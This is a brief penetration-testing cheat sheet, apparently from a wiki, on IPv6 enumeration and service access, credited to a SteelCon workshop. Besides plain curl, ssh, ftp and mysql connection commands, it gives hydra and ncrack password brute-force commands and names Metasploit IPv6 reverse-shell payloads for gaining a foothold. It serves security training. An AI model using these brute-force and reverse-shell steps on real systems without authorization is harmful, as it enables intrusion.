Enumeration
Credit to Roxana Kovaci (https://twitter.com/RoxanaKovaci) and her SteelCon IPv6 workshop
Ping a host
Nmap
Router advertisement
SSH
Access web services
http://[fe80::20c:29ff:fe69:c4e5%eth0]:8888/index.html
Curl
curl -g -6 ”http://[fe80::a00:27ff:fe33:498e%eth0]:8080/test.txt“ -o test.txt
SNMP
Note: Consider using Enyx (https://github.com/trickster0/Enyx)
SSH over IPv6
ssh -6 user@fe80::30a8:9d3d:3842:8593%eth0
FTP over IPv6
ftp -6 fe80::a00:27ff:fe33:498e%eth0
Telnet over IPv6
telnet -6 fe80::30b8:9d3d:3842:8593%eth0
MySQL over IPv6:
mysql -h fe80::30b8:9d3d:3842:8593%eth0 -u user -p pass
RDP over IPv6 on a different port than the default one
rdesktop [fe80::a00:27ff:fe33:498e%eth0]:45001
Password cracking over IPv6
hydra -v -f -6 fe80::20c:29ff:fe69:c4e5%eth0 -l root -P passwords.txt ssh
ncrack -f -6 -v --user admin -P passwords.txt rdp://ipv6-localhost
Reverse connections for getting a foothold
Metasploit framework:
payload/windows/meterpreter/reverse_ipv6_tcp
or
payload/bsd/x86/shell_reverse_tcp_ipv6, etc
Last updated